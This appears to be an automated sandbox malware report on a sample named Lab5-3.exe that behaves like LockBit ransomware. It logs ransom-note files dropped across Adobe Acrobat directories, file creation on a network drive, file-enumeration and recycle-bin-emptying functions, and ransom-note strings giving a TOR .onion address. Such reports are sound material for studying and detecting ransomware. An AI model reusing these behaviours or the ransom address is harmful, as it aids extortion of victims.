                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-gb\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: unknownHTTPS traffic detected: 23.202.106.101:443 -> 192.168.2.4:50245 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 23.202.106.101:443 -> 192.168.2.4:50246 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:50247 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:51267 version: TLS 1.2
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\MakeAccessible.pdb source: MakeAccessible.api.lockbit.27.dr
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\MakeAccessible.pdb< source: MakeAccessible.api.lockbit.27.dr
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\ReadOutLoud.pdb source: Lab5-3.exe, 0000001B.00000003.2122488280.000000001C330000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: d:\dbs\sh\odct\1105_210049_0\client\onedrive\Setup\Standalone\exe\obj\i386\OneDriveSetup.pdb source: wctF86A.tmp.lockbit.0.dr

                      Spreading

                      barindex
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: Z:\Jump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: Z:\$RECYCLE.BINJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: Z:\$RECYCLE.BIN\S-1-5-21-2246122658-3693405117-2476756634-1002Jump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: Z:\$RECYCLE.BIN\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: Z:\
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: Z:\
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00410170 NetApiBufferFree,RtlEnterCriticalSection,lstrcmpiW,lstrcmpiW,wsprintfW,wsprintfW,FindFirstFileExW,RtlLeaveCriticalSection,ExitThread,FindClose,wsprintfW,CreateFileW,RtlLeaveCriticalSection,ExitThread,malloc,RtlLeaveCriticalSection,SHEmptyRecycleBinW,GetDiskFreeSpaceExW,SetThreadUILanguage,StrFormatByteSize64A,StrFormatByteSize64A,StrFormatByteSize64A,wsprintfA,CloseHandle,DeleteFileW,ExitThread,19_2_00410170
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00410530 GetFileAttributesW,SetFileAttributesW,wsprintfW,FindFirstFileExW,FindNextFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,wsprintfW,PathFindExtensionW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathAddBackslashW,SetFileAttributesW,FindNextFileW,FindNextFileW,FindClose,19_2_00410530
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00410170 RtlEnterCriticalSection,lstrcmpiW,lstrcmpiW,wsprintfW,wsprintfW,FindFirstFileExW,RtlLeaveCriticalSection,ExitThread,RtlExitUserThread,FindClose,wsprintfW,CreateFileW,RtlLeaveCriticalSection,ExitThread,malloc,RtlLeaveCriticalSection,SHEmptyRecycleBinW,GetDiskFreeSpaceExW,SetThreadUILanguage,StrFormatByteSize64A,StrFormatByteSize64A,StrFormatByteSize64A,wsprintfA,CloseHandle,DeleteFileW,ExitThread,27_2_00410170
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00410530 GetFileAttributesW,SetFileAttributesW,wsprintfW,FindFirstFileExW,FindNextFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,wsprintfW,PathFindExtensionW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathAddBackslashW,SetFileAttributesW,FindNextFileW,FindNextFileW,FindClose,27_2_00410530
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\Cache\Jump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile opened: C:\Documents and Settings\user\Local Settings\Adobe\Jump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile opened: C:\Documents and Settings\user\Local Settings\Jump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\Jump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\Jump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\SOPHIA\Jump to behavior

                      Networking

                      barindex
                      Source: Lab5-3.exe, 00000000.00000000.1629021077.000000000041B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?
                      Source: Lab5-3.exe, 00000000.00000000.1629021077.000000000041B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/? Starting IO threads...Unable to bind NOTE file IOCP %S error: %d
                      Source: Lab5-3.exe, 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?
                      Source: Lab5-3.exe, 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/? Starting IO threads...Unable to bind NOTE file IOCP %S error: %d
                      Source: Lab5-3.exe, 00000013.00000000.1764646363.000000000041B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?
                      Source: Lab5-3.exe, 00000013.00000000.1764646363.000000000041B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/? Starting IO threads...Unable to bind NOTE file IOCP %S error: %d
                      Source: Lab5-3.exe, 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?
